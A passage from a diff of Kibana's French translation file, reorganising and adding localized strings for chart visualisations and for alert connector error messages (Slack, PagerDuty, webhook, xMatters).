Peut être linéaire, logarithmique ou racine carrée", - "visTypeXy.function.seriesParam.circlesRadius.help": "Définit la taille des cercles (rayon)", - "visTypeXy.function.seriesParam.drawLinesBetweenPoints.help": "Trace des lignes entre des points", - "visTypeXy.function.seriesparam.help": "Génère un objet paramètres de la série", - "visTypeXy.function.seriesParam.id.help": "ID des paramètres de la série", - "visTypeXy.function.seriesParam.interpolate.help": "Mode d'interpolation. Peut être linéaire, cardinal ou palier suivant", - "visTypeXy.function.seriesParam.label.help": "Nom des paramètres de la série", - "visTypeXy.function.seriesParam.lineWidth.help": "Largeur de ligne", - "visTypeXy.function.seriesParam.mode.help": "Mode graphique. Peut être empilé ou pourcentage", - "visTypeXy.function.seriesParam.show.help": "Afficher les paramètres", - "visTypeXy.function.seriesParam.showCircles.help": "Afficher les cercles", - "visTypeXy.function.seriesParam.type.help": "Type de graphique. Peut être linéaire, en aires ou histogramme", - "visTypeXy.function.seriesParam.valueAxis.help": "Nom de l'axe des valeurs", - "visTypeXy.function.thresholdLine.color.help": "Couleur de la ligne de seuil", - "visTypeXy.function.thresholdLine.help": "Génère un objet ligne de seuil", - "visTypeXy.function.thresholdLine.show.help": "Afficher la ligne de seuil", - "visTypeXy.function.thresholdLine.style.help": "Style de la ligne de seuil. 
Peut être pleine, en tirets ou en point-tiret", - "visTypeXy.function.thresholdLine.value.help": "Valeur seuil", - "visTypeXy.function.thresholdLine.width.help": "Largeur de la ligne de seuil", - "visTypeXy.function.timeMarker.class.help": "Nom de classe Css", - "visTypeXy.function.timeMarker.color.help": "Couleur du repère de temps", - "visTypeXy.function.timemarker.help": "Génère un objet repère de temps", - "visTypeXy.function.timeMarker.opacity.help": "Opacité du repère de temps", - "visTypeXy.function.timeMarker.time.help": "Heure exacte", - "visTypeXy.function.timeMarker.width.help": "Largeur du repère de temps", - "visTypeXy.function.valueAxis.axisParams.help": "Paramètres de l'axe des valeurs", - "visTypeXy.function.valueaxis.help": "Génère l'objet axe des valeurs", - "visTypeXy.function.valueAxis.name.help": "Nom de l'axe des valeurs", - "visTypeXy.functions.help": "Visualisation XY", "visTypeXy.histogram.groupTitle": "Diviser la série", "visTypeXy.histogram.histogramDescription": "Présente les données en barres verticales sur un axe.", "visTypeXy.histogram.histogramTitle": "Barre verticale", - "visTypeXy.histogram.metricTitle": "Axe Y", + "visTypeXy.histogram.metricTitle": "Axe Y", "visTypeXy.histogram.radiusTitle": "Taille du point", "visTypeXy.histogram.segmentTitle": "Axe X", "visTypeXy.histogram.splitTitle": "Diviser le graphique", "visTypeXy.horizontalBar.groupTitle": "Diviser la série", "visTypeXy.horizontalBar.horizontalBarDescription": "Présente les données en barres horizontales sur un axe.", "visTypeXy.horizontalBar.horizontalBarTitle": "Barre horizontale", - "visTypeXy.horizontalBar.metricTitle": "Axe Y", + "visTypeXy.horizontalBar.metricTitle": "Axe Y", "visTypeXy.horizontalBar.radiusTitle": "Taille du point", "visTypeXy.horizontalBar.segmentTitle": "Axe X", "visTypeXy.horizontalBar.splitTitle": "Diviser le graphique", "visTypeXy.interpolationModes.smoothedText": "Lissé", "visTypeXy.interpolationModes.steppedText": "Par paliers", 
"visTypeXy.interpolationModes.straightText": "Droit", - "visTypeXy.legend.filterForValueButtonAriaLabel": "Filtre pour la valeur", - "visTypeXy.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", - "visTypeXy.legend.filterOutValueButtonAriaLabel": "Exclure la valeur", "visTypeXy.legendPositions.bottomText": "Bas", "visTypeXy.legendPositions.leftText": "Gauche", "visTypeXy.legendPositions.rightText": "Droite", @@ -7103,7 +6179,7 @@ "visTypeXy.line.groupTitle": "Diviser la série", "visTypeXy.line.lineDescription": "Affiche les données sous forme d'une série de points.", "visTypeXy.line.lineTitle": "Ligne", - "visTypeXy.line.metricTitle": "Axe Y", + "visTypeXy.line.metricTitle": "Axe Y", "visTypeXy.line.radiusTitle": "Taille du point", "visTypeXy.line.segmentTitle": "Axe X", "visTypeXy.line.splitTitle": "Diviser le graphique", 
@@ -7113,36 +6189,52 @@ "visTypeXy.thresholdLine.style.dashedText": "Tirets", "visTypeXy.thresholdLine.style.dotdashedText": "Point-tiret", "visTypeXy.thresholdLine.style.fullText": "Pleine", + "visualizations.byValue_pageHeading": "Visualisation de type {chartType} intégrée à l'application {originatingApp}", + "visualizations.confirmModal.overwriteConfirmationMessage": "Êtes-vous sûr de vouloir écraser {title} ?", + "visualizations.confirmModal.overwriteTitle": "Écraser {name} ?", + "visualizations.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}", + "visualizations.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?", + "visualizations.disabledLabVisualizationTitle": "{title} est une visualisation lab.", + "visualizations.embeddable.legacyURLConflict.errorMessage": "Cette visualisation a la même URL qu'un alias hérité. Désactiver l'alias pour résoudre cette erreur : {json}", + "visualizations.experimentalVisInfoText": "Elle pourra être modifiée ou supprimée totalement dans une prochaine version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités en version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. 
Pour apporter des commentaires, veuillez créer une entrée dans {githubLink}.", + "visualizations.fallbackDataView.label": "{type} introuvable", + "visualizations.function.findAccessorOrFail.error.accessor": "Le nom de la colonne ou l'index fourni sont non valides : {accessor}", + "visualizations.legacyUrlConflict.objectNoun": "Visualisation {visName}", + "visualizations.missedDataView.errorMessage": "Impossible de trouver le {type} : {id}", + "visualizations.newChart.conditionalMessage.newLibrary": "Passer à la bibliothèque {type} dans {link}", + "visualizations.newGaugeChart.notificationMessage": "La nouvelle bibliothèque de graphiques de jauge ne prend pas encore en charge l'agrégation de graphiques fractionnés. {conditionalMessage}", + "visualizations.newHeatmapChart.notificationMessage": "La nouvelle bibliothèque de graphiques de cartes thermiques ne prend pas encore en charge l'agrégation de graphiques fractionnés. {conditionalMessage}", + "visualizations.newVisWizard.newVisTypeTitle": "Nouveau {visTypeName}", + "visualizations.newVisWizard.resultsFound": "{resultCount, plural, one {type trouvé} other {types trouvés}}", + "visualizations.noMatchRoute.bannerText": "L'application Visualize ne reconnaît pas cet itinéraire : {route}.", + "visualizations.oldPieChart.notificationMessage": "Vous utilisez la bibliothèque de graphiques existante qui sera supprimée dans une prochaine version. {conditionalMessage}", + "visualizations.pageHeading": "Visualisation {chartType} {chartName}", + "visualizations.reporting.defaultReportTitle": "Visualisation [{date}]", + "visualizations.topNavMenu.updatePanel": "Mettre à jour le panneau sur {originatingAppName}", + "visualizations.visualizationTypeInvalidMessage": "Type de visualisation non valide \"{visType}\"", + "visualizations.visualizeListingDashboardFlowDescription": "Vous créez un tableau de bord ? 
Créez et ajoutez vos visualisations directement depuis l'{dashboardApp}.", "visualizations.advancedSettings.visualizeEnableLabsText": "Si l'option est activée, elle vous permet de créer, d'afficher et de modifier des visualisations qui sont en version d'évaluation technique. Si elle est désactivée, seules les visualisations prêtes pour la production sont disponibles.", "visualizations.advancedSettings.visualizeEnableLabsTitle": "Activer les visualisations de la version d'évaluation technique", "visualizations.badge.readOnly.text": "Lecture seule", "visualizations.badge.readOnly.tooltip": "Impossible d'enregistrer les visualisations dans la bibliothèque", - "visualizations.byValue_pageHeading": "Visualisation de type {chartType} intégrée à l'application {originatingApp}", "visualizations.confirmModal.cancelButtonLabel": "Annuler", - "visualizations.confirmModal.confirmTextDescription": "Quitter l'éditeur Visualize sans enregistrer les modifications ?", + "visualizations.confirmModal.confirmTextDescription": "Quitter l'éditeur Visualize sans enregistrer les modifications ?", "visualizations.confirmModal.overwriteButtonLabel": "Écraser", - "visualizations.confirmModal.overwriteConfirmationMessage": "Êtes-vous sûr de vouloir écraser {title} ?", - "visualizations.confirmModal.overwriteTitle": "Écraser {name} ?", - "visualizations.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}", - "visualizations.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?", "visualizations.confirmModal.title": "Modifications non enregistrées", "visualizations.controls.notificationMessage": "Les contrôles d'entrée sont déclassés et seront supprimés dans une prochaine version. Utilisez les nouveaux contrôles pour filtrer les données de votre tableau de bord et interagir avec elles. 
", "visualizations.createVisualization.failedToLoadErrorMessage": "Impossible de charger la visualisation", "visualizations.createVisualization.noIndexPatternOrSavedSearchIdErrorMessage": "Vous devez fournir un indexPattern ou un savedSearchId", "visualizations.createVisualization.noVisTypeErrorMessage": "Vous devez fournir un type de visualisation valide", + "visualizations.dataView.label": "Vue de données", "visualizations.deprecatedTag": "Déclassé", "visualizations.disabledLabVisualizationLink": "Lire la documentation", "visualizations.disabledLabVisualizationMessage": "Veuillez activer le mode lab dans les paramètres avancés pour consulter les visualisations lab.", - "visualizations.disabledLabVisualizationTitle": "{title} est une visualisation lab.", "visualizations.displayName": "Visualisation", "visualizations.editor.createBreadcrumb": "Créer", "visualizations.editor.defaultEditBreadcrumbText": "Modifier la visualisation", "visualizations.embeddable.inspectorTitle": "Inspecteur", - "visualizations.embeddable.legacyURLConflict.errorMessage": "Cette visualisation a la même URL qu'un alias hérité. Désactiver l'alias pour résoudre cette erreur : {json}", "visualizations.embeddable.placeholderTitle": "Titre de l'espace réservé", - "visualizations.experimentalVisInfoText": "Elle pourra être modifiée ou supprimée totalement dans une prochaine version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités en version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. 
Pour apporter des commentaires, veuillez créer une entrée dans {githubLink}.",
 "visualizations.experimentalVisInfoTitle": "Cette fonctionnalité est en version d'évaluation technique.",
- "visualizations.function.findAccessorOrFail.error.accessor": "Le nom de la colonne ou l'index fourni sont non valides : {accessor}",
 "visualizations.function.range.from.help": "Début de la plage",
 "visualizations.function.range.help": "Génère un objet plage",
 "visualizations.function.range.to.help": "Fin de la plage",
@@ -7157,7 +6249,6 @@
 "visualizations.function.xyDimension.visDimension.help": "Configuration de l'objet dimension",
 "visualizations.helpMenu.appName": "Bibliothèque Visualize",
 "visualizations.legacyCharts.conditionalMessage.noPermissions": "Contactez votre administrateur système pour passer à l'ancienne bibliothèque.",
- "visualizations.legacyUrlConflict.objectNoun": "Visualisation {visName}",
 "visualizations.linkedToSearch.unlinkSuccessNotificationText": "Dissocié de la recherche enregistrée \"{searchTitle}\"",
 "visualizations.listing.betaTitle": "Version bêta",
 "visualizations.listing.betaTooltip": "Cette visualisation est en version bêta et susceptible d'être modifiée. La conception et le code sont moins matures que les fonctionnalités officielles en disponibilité générale et sont fournis tels quels sans aucune garantie. Les fonctionnalités bêta ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale",
@@ -7177,11 +6268,8 @@
 "visualizations.missedDataView.dataViewReconfigure": "Recréez-la dans la page de gestion des vues de données.",
 "visualizations.missedDataView.editInVisualizeEditor": "Effectuer des modifications dans l'éditeur Visualize pour corriger l'erreur",
 "visualizations.newChart.conditionalMessage.advancedSettingsLink": "Paramètres avancés.",
- "visualizations.newChart.conditionalMessage.newLibrary": "Passer à la bibliothèque {type} dans {link}",
 "visualizations.newChart.libraryMode.new": "nouveau",
 "visualizations.newChart.libraryMode.old": "âge",
- "visualizations.newGaugeChart.notificationMessage": "La nouvelle bibliothèque de graphiques de jauge ne prend pas encore en charge l'agrégation de graphiques fractionnés. {conditionalMessage}",
- "visualizations.newHeatmapChart.notificationMessage": "La nouvelle bibliothèque de graphiques de cartes thermiques ne prend pas encore en charge l'agrégation de graphiques fractionnés. {conditionalMessage}",
 "visualizations.newVisWizard.aggBasedGroupDescription": "Utilisez notre bibliothèque Visualize classique pour créer des graphiques basés sur des agrégations.",
 "visualizations.newVisWizard.aggBasedGroupTitle": "Basé sur une agrégation",
 "visualizations.newVisWizard.chooseSourceTitle": "Choisir une source",
@@ -7191,25 +6279,22 @@ "visualizations.newVisWizard.filterVisTypeAriaLabel": "Filtrer un type de visualisation", "visualizations.newVisWizard.goBackLink": "Sélectionner une visualisation différente", "visualizations.newVisWizard.helpTextAriaLabel": "Commencez à créer votre visualisation en sélectionnant un type pour cette visualisation. Appuyez sur Échap pour fermer ce mode. Appuyez sur Tab pour aller plus loin.", - "visualizations.newVisWizard.learnMoreText": "Envie d'en savoir plus ?", - "visualizations.newVisWizard.newVisTypeTitle": "Nouveau {visTypeName}", + "visualizations.newVisWizard.learnMoreText": "Envie d'en savoir plus ?", "visualizations.newVisWizard.readDocumentationLink": "Lire la documentation", - "visualizations.newVisWizard.resultsFound": "{resultCount, plural, one {type trouvé} other {types trouvés}}", "visualizations.newVisWizard.searchSelection.notFoundLabel": "Aucun recherche enregistrée ni aucun index correspondants n'ont été trouvés.", "visualizations.newVisWizard.searchSelection.savedObjectType.dataView": "Vue de données", "visualizations.newVisWizard.searchSelection.savedObjectType.search": "Recherche enregistrée", "visualizations.newVisWizard.title": "Nouvelle visualisation", "visualizations.newVisWizard.toolsGroupTitle": "Outils", - "visualizations.noMatchRoute.bannerText": "L'application Visualize ne reconnaît pas cet itinéraire : {route}.", + "visualizations.noDataView.label": "vue de données", "visualizations.noMatchRoute.bannerTitleText": "Page introuvable", "visualizations.noResultsFoundTitle": "Résultat introuvable", - "visualizations.oldPieChart.notificationMessage": "Vous utilisez la bibliothèque de graphiques existante qui sera supprimée dans une prochaine version. 
{conditionalMessage}", + "visualizations.noSearch.label": "rechercher", "visualizations.overwriteRejectedDescription": "La confirmation d'écrasement a été rejetée.", - "visualizations.pageHeading": "Visualisation {chartType} {chartName}", - "visualizations.reporting.defaultReportTitle": "Visualisation [{date}]", "visualizations.savedObjectName": "Visualisation", "visualizations.saveDuplicateRejectedDescription": "La confirmation d'enregistrement avec un doublon de titre a été rejetée.", "visualizations.savingVisualizationFailed.errorMsg": "L'enregistrement de la visualisation a échoué", + "visualizations.search.label": "Recherche", "visualizations.tonNavMenu.tryItBadgeText": "Essayer", "visualizations.topNavMenu.cancelAndReturnButtonTooltip": "Abandonner vos modifications avant de terminer", "visualizations.topNavMenu.cancelButtonAriaLabel": "Revenir à la dernière application sans enregistrer les modifications", 
@@ -7232,43 +6317,74 @@ "visualizations.topNavMenu.saveVisualizationToLibraryButtonLabel": "Enregistrer dans la bibliothèque", "visualizations.topNavMenu.shareVisualizationButtonAriaLabel": "Partager la visualisation", "visualizations.topNavMenu.shareVisualizationButtonLabel": "partager", - "visualizations.topNavMenu.updatePanel": "Mettre à jour le panneau sur {originatingAppName}", "visualizations.visualizationLoadingFailedErrorMessage": "Impossible de charger la visualisation", - "visualizations.visualizationTypeInvalidMessage": "Type de visualisation non valide \"{visType}\"", "visualizations.visualizeDescription": "Créez des visualisations et des datastores agrégés dans vos index Elasticsearch.", "visualizations.visualizeListingBreadcrumbsTitle": "Bibliothèque Visualize", "visualizations.visualizeListingDashboardAppName": "Application Tableau de bord", - "visualizations.visualizeListingDashboardFlowDescription": "Vous créez un tableau de bord ? Créez et ajoutez vos visualisations directement depuis l'{dashboardApp}.", "visualizations.visualizeListingDeleteErrorTitle": "Erreur lors de la suppression de la visualisation", "xpack.actions.actionTypeRegistry.get.missingActionTypeErrorMessage": "Le type d'action \"{id}\" n'est pas enregistré.", "xpack.actions.actionTypeRegistry.register.duplicateActionTypeErrorMessage": "Le type d'action \"{id}\" est déjà enregistré.", + "xpack.actions.actionTypeRegistry.register.invalidConnectorFeatureIds": "ID \"{ids}\" de fonctionnalité non valides pour le type de connecteur \"{connectorTypeId}\".", + "xpack.actions.actionTypeRegistry.register.missingSupportedFeatureIds": "Au moins une valeur \"supportedFeatureId\" doit être fournie pour le type de connecteur \"{connectorTypeId}\".", + "xpack.actions.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.casesWebhook.casesWebhookConfigurationError": "erreur lors de la configuration de l'action webhook des cas : 
{err}", + "xpack.actions.builtin.casesWebhook.casesWebhookConfigurationErrorNoHostname": "erreur lors de la configuration de l'action webhook des cas : impossible d'analyser l'url {url} : {err}", + "xpack.actions.builtin.casesWebhook.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.configuration.apiValidateMissingOAuthFieldError": "{field} doit être fourni quand isOAuth = {isOAuth}", + "xpack.actions.builtin.configuration.apiValidateOAuthFieldError": "{field} ne doit pas être fourni quand isOAuth = {isOAuth}", + "xpack.actions.builtin.email.customViewInKibanaMessage": "Ce message a été envoyé par Kibana. [{kibanaFooterLinkText}]({link}).", + "xpack.actions.builtin.jira.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.pagerduty.invalidTimestampErrorMessage": "erreur lors de l'analyse de l'horodatage \"{timestamp}\"", + "xpack.actions.builtin.pagerduty.missingDedupkeyErrorMessage": "DedupKey est requis lorsque eventAction est \"{eventAction}\"", + "xpack.actions.builtin.pagerduty.pagerdutyConfigurationError": "erreur lors de la configuration de l'action pagerduty : {message}", + "xpack.actions.builtin.pagerduty.postingRetryErrorMessage": "erreur lors de la publication de l'événement pagerduty : statut http {status}, réessayer ultérieurement", + "xpack.actions.builtin.pagerduty.postingUnexpectedErrorMessage": "erreur lors de la publication de l'événement pagerduty : statut inattendu {status}", + "xpack.actions.builtin.pagerduty.timestampParsingFailedErrorMessage": "erreur lors de l'analyse de l'horodatage \"{timestamp}\" : {message}", + "xpack.actions.builtin.slack.errorPostingRetryDateErrorMessage": "erreur lors de la publication d'un message slack, réessayer à 
cette date/heure : {retryString}", + "xpack.actions.builtin.slack.slackConfigurationError": "erreur lors de la configuration de l'action slack : {message}", + "xpack.actions.builtin.slack.unexpectedHttpResponseErrorMessage": "réponse http inattendue de Slack : {httpStatus} {httpStatusText}", + "xpack.actions.builtin.swimlane.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.teams.errorPostingRetryDateErrorMessage": "erreur lors de la publication d'un message Microsoft Teams, réessayer à cette date/heure : {retryString}", + "xpack.actions.builtin.teams.teamsConfigurationError": "erreur lors de la configuration de l'action teams : {message}", + "xpack.actions.builtin.webhook.invalidResponseRetryDateErrorMessage": "erreur lors de l'appel de webhook, réessayer à cette date/heure : {retryString}", + "xpack.actions.builtin.webhook.webhookConfigurationError": "erreur lors de la configuration de l'action webhook : {message}", + "xpack.actions.builtin.webhook.webhookConfigurationErrorNoHostname": "erreur lors de la configuration de l'action webhook : impossible d'analyser l'url : {err}", + "xpack.actions.builtin.xmatters.postingRetryErrorMessage": "Erreur lors du déclenchement du flux xMatters : statut http {status}, réessayer plus tard", + "xpack.actions.builtin.xmatters.unexpectedStatusErrorMessage": "Erreur de déclenchement du flux xMatters : statut inattendu {status}", + "xpack.actions.builtin.xmatters.xmattersConfigurationError": "Erreur lors de la configuration de l'action xMatters : {message}", + "xpack.actions.builtin.xmatters.xmattersConfigurationErrorNoHostname": "Erreur lors de la configuration de l'action xMatters : impossible d'analyser l'url : {err}", + "xpack.actions.builtin.xmatters.xmattersHostnameNotAllowed": "{message}", + "xpack.actions.builtin.xmatters.xmattersInvalidUrlError": "secretsUrl non valide : {err}", + "xpack.actions.disabledActionTypeError": "le type d'action 
\"{actionType}\" n'est pas activé dans la configuration Kibana xpack.actions.enabledActionTypes", + "xpack.actions.savedObjects.onImportText": "{connectorsWithSecretsLength} {connectorsWithSecretsLength, plural, one {Le connecteur contient} other {Les connecteurs contiennent}} des informations sensibles qui requièrent des mises à jour.", + "xpack.actions.serverSideErrors.expirerdLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car votre licence {licenseType} a expiré.", + "xpack.actions.serverSideErrors.invalidLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car votre licence {licenseType} ne le prend pas en charge. Veuillez mettre à niveau votre licence.", + "xpack.actions.serverSideErrors.predefinedActionDeleteDisabled": "L'action préconfigurée {id} n'est pas autorisée à effectuer des suppressions.", + "xpack.actions.serverSideErrors.predefinedActionUpdateDisabled": "L'action préconfigurée {id} n'est pas autorisée à effectuer des mises à jour.", + "xpack.actions.serverSideErrors.unavailableLicenseErrorMessage": "Le type d'action {actionTypeId} est désactivé, car les informations de licence ne sont pas disponibles actuellement.", + "xpack.actions.urlAllowedHostsConfigurationError": "Le {field} cible \"{value}\" n'est pas ajouté à la configuration Kibana xpack.actions.allowedHosts", "xpack.actions.alertHistoryEsIndexConnector.name": "Index Elasticsearch d'historique d'alertes", - "xpack.actions.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", "xpack.actions.appName": "Actions", + "xpack.actions.availableConnectorFeatures.alerting": "Alerting", + "xpack.actions.availableConnectorFeatures.cases": "Cas", + "xpack.actions.availableConnectorFeatures.securitySolution": "Solution de sécurité", + "xpack.actions.availableConnectorFeatures.uptime": "Uptime", "xpack.actions.builtin.case.swimlaneTitle": "Swimlane", + "xpack.actions.builtin.cases.casesWebhookTitle": "Webhook - Gestion des 
cas", "xpack.actions.builtin.cases.jiraTitle": "Jira", "xpack.actions.builtin.cases.resilientTitle": "IBM Resilient", - "xpack.actions.builtin.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", + "xpack.actions.builtin.casesWebhook.invalidUsernamePassword": "l'utilisateur et le mot de passe doivent être spécifiés", "xpack.actions.builtin.configuration.apiBasicAuthCredentialsError": "le nom d'utilisateur et le mot de passe doivent être tous deux spécifiés", "xpack.actions.builtin.configuration.apiCredentialsError": "Les informations d'identification auth ou OAuth de base doivent être spécifiées", "xpack.actions.builtin.configuration.apiOAuthCredentialsError": "clientSecret et privateKey doivent tous deux être spécifiés", - "xpack.actions.builtin.configuration.apiValidateMissingOAuthFieldError": "{field} doit être fourni quand isOAuth = {isOAuth}", - "xpack.actions.builtin.configuration.apiValidateOAuthFieldError": "{field} ne doit pas être fourni quand isOAuth = {isOAuth}", - "xpack.actions.builtin.email.customViewInKibanaMessage": "Ce message a été envoyé par Kibana. 
[{kibanaFooterLinkText}]({link}).", "xpack.actions.builtin.email.errorSendingErrorMessage": "erreur lors de l'envoi de l'e-mail", "xpack.actions.builtin.email.kibanaFooterLinkText": "Accéder à Kibana", "xpack.actions.builtin.email.sentByKibanaMessage": "Ce message a été envoyé par Kibana.", "xpack.actions.builtin.emailTitle": "E-mail", "xpack.actions.builtin.esIndex.errorIndexingErrorMessage": "erreur lors de l'indexation des documents", "xpack.actions.builtin.esIndexTitle": "Index", - "xpack.actions.builtin.jira.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", - "xpack.actions.builtin.pagerduty.invalidTimestampErrorMessage": "erreur lors de l'analyse de l'horodatage \"{timestamp}\"", - "xpack.actions.builtin.pagerduty.missingDedupkeyErrorMessage": "DedupKey est requis lorsque eventAction est \"{eventAction}\"", - "xpack.actions.builtin.pagerduty.pagerdutyConfigurationError": "erreur lors de la configuration de l'action pagerduty : {message}", "xpack.actions.builtin.pagerduty.postingErrorMessage": "erreur lors de la publication de l'événement pagerduty", - "xpack.actions.builtin.pagerduty.postingRetryErrorMessage": "erreur lors de la publication de l'événement pagerduty : statut http {status}, réessayer ultérieurement", - "xpack.actions.builtin.pagerduty.postingUnexpectedErrorMessage": "erreur lors de la publication de l'événement pagerduty : statut inattendu {status}", - "xpack.actions.builtin.pagerduty.timestampParsingFailedErrorMessage": "erreur lors de l'analyse de l'horodatage \"{timestamp}\" : {message}", "xpack.actions.builtin.pagerdutyTitle": "PagerDuty", "xpack.actions.builtin.serverLog.errorLoggingErrorMessage": "erreur lors du logging du message", "xpack.actions.builtin.serverLogTitle": "Log de serveur", 
@@ -7277,30 +6393,21 @@ "xpack.actions.builtin.serviceNowSIRTitle": "ServiceNow SecOps", "xpack.actions.builtin.serviceNowTitle": "ServiceNow", "xpack.actions.builtin.slack.errorPostingErrorMessage": "erreur lors de la publication du message slack", - "xpack.actions.builtin.slack.errorPostingRetryDateErrorMessage": "erreur lors de la publication d'un message slack, réessayer à cette date/heure : {retryString}", "xpack.actions.builtin.slack.errorPostingRetryLaterErrorMessage": "erreur lors de la publication d'un message slack, réessayer ultérieurement", - "xpack.actions.builtin.slack.slackConfigurationError": "erreur lors de la configuration de l'action slack : {message}", - "xpack.actions.builtin.slack.slackConfigurationErrorNoHostname": "erreur lors de la configuration de l'action slack : impossible d'analyser le nom de l'hôte depuis webhookUrl", - "xpack.actions.builtin.slack.unexpectedHttpResponseErrorMessage": "réponse http inattendue de Slack : {httpStatus} {httpStatusText}", + "xpack.actions.builtin.slack.slackConfigurationErrorNoHostname": "erreur lors de la configuration de l'action slack : impossible d'analyser le nom de l'hôte depuis webhookUrl", "xpack.actions.builtin.slack.unexpectedNullResponseErrorMessage": "réponse nulle inattendue de Slack", "xpack.actions.builtin.slackTitle": "Slack", - "xpack.actions.builtin.swimlane.configuration.apiAllowedHostsError": "erreur lors de la configuration de l'action du connecteur : {message}", "xpack.actions.builtin.swimlaneTitle": "Swimlane", - "xpack.actions.builtin.teams.errorPostingRetryDateErrorMessage": "erreur lors de la publication d'un message Microsoft Teams, réessayer à cette date/heure : {retryString}", "xpack.actions.builtin.teams.errorPostingRetryLaterErrorMessage": "erreur lors de la publication d'un message Microsoft Teams, réessayer ultérieurement", "xpack.actions.builtin.teams.invalidResponseErrorMessage": "erreur lors de la publication sur Microsoft Teams, réponse non valide", - 
"xpack.actions.builtin.teams.teamsConfigurationError": "erreur lors de la configuration de l'action teams : {message}", - "xpack.actions.builtin.teams.teamsConfigurationErrorNoHostname": "erreur lors de la configuration de l'action teams : impossible d'analyser le nom de l'hôte depuis webhookUrl", + "xpack.actions.builtin.teams.teamsConfigurationErrorNoHostname": "erreur lors de la configuration de l'action teams : impossible d'analyser le nom de l'hôte depuis webhookUrl", "xpack.actions.builtin.teams.unreachableErrorMessage": "erreur lors de la publication sur Microsoft Teams, erreur inattendue", "xpack.actions.builtin.teamsTitle": "Microsoft Teams", "xpack.actions.builtin.webhook.invalidResponseErrorMessage": "erreur lors de l'appel de webhook, réponse non valide", - "xpack.actions.builtin.webhook.invalidResponseRetryDateErrorMessage": "erreur lors de l'appel de webhook, réessayer à cette date/heure : {retryString}", "xpack.actions.builtin.webhook.invalidResponseRetryLaterErrorMessage": "erreur lors de l'appel de webhook, réessayer ultérieurement", "xpack.actions.builtin.webhook.invalidUsernamePassword": "l'utilisateur et le mot de passe doivent être spécifiés", "xpack.actions.builtin.webhook.requestFailedErrorMessage": "erreur lors de l'appel de webhook, requête échouée", "xpack.actions.builtin.webhook.unreachableErrorMessage": "erreur lors de l'appel de webhook, erreur inattendue", - "xpack.actions.builtin.webhook.webhookConfigurationError": "erreur lors de la configuration de l'action webhook : {message}", - "xpack.actions.builtin.webhook.webhookConfigurationErrorNoHostname": "erreur lors de la configuration de l'action webhook : impossible d'analyser l'url : {err}", "xpack.actions.builtin.webhookTitle": "Webhook", "xpack.actions.builtin.xmatters.invalidUsernamePassword": "L'utilisateur et le mot de passe doivent être spécifiés.", "xpack.actions.builtin.xmatters.missingConfigUrl": "Fournir une configUrl valide", 
@@ -7310,60 +6417,213 @@ "xpack.actions.builtin.xmatters.noSecretsProvided": "Fournir le lien secretsUrl ou le nom d'utilisateur/le mot de passe pour vous authentifier", "xpack.actions.builtin.xmatters.noUserPassWhenSecretsUrl": "Impossible d'utiliser le nom d'utilisateur/le mot de passe pour l'authentification de l'URL. Fournir une secretsUrl valide ou utiliser l'authentification de base.", "xpack.actions.builtin.xmatters.postingErrorMessage": "Erreur de déclenchement du workflow xMatters", - "xpack.actions.builtin.xmatters.postingRetryErrorMessage": "Erreur lors du déclenchement du flux xMatters : statut http {status}, réessayer plus tard", "xpack.actions.builtin.xmatters.shouldNotHaveConfigUrl": "configUrl ne doit pas être fournie lorsque usesBasic est faux", "xpack.actions.builtin.xmatters.shouldNotHaveSecretsUrl": "secretsUrl ne doit pas être fournie lorsque usesBasic est vrai", "xpack.actions.builtin.xmatters.shouldNotHaveUsernamePassword": "Le nom d'utilisateur et le mot de passe ne doivent pas être fournis lorsque usesBasic est faux", - "xpack.actions.builtin.xmatters.unexpectedStatusErrorMessage": "Erreur de déclenchement du flux xMatters : statut inattendu {status}", - "xpack.actions.builtin.xmatters.xmattersConfigurationError": "Erreur lors de la configuration de l'action xMatters : {message}", - "xpack.actions.builtin.xmatters.xmattersConfigurationErrorNoHostname": "Erreur lors de la configuration de l'action xMatters : impossible d'analyser l'url : {err}", - "xpack.actions.builtin.xmatters.xmattersHostnameNotAllowed": "{message}", - "xpack.actions.builtin.xmatters.xmattersInvalidUrlError": "secretsUrl non valide : {err}", "xpack.actions.builtin.xmattersTitle": "xMatters", - "xpack.actions.disabledActionTypeError": "le type d'action \"{actionType}\" n'est pas activé dans la configuration Kibana xpack.actions.enabledActionTypes", "xpack.actions.featureRegistry.actionsFeatureName": "Actions et connecteurs", 
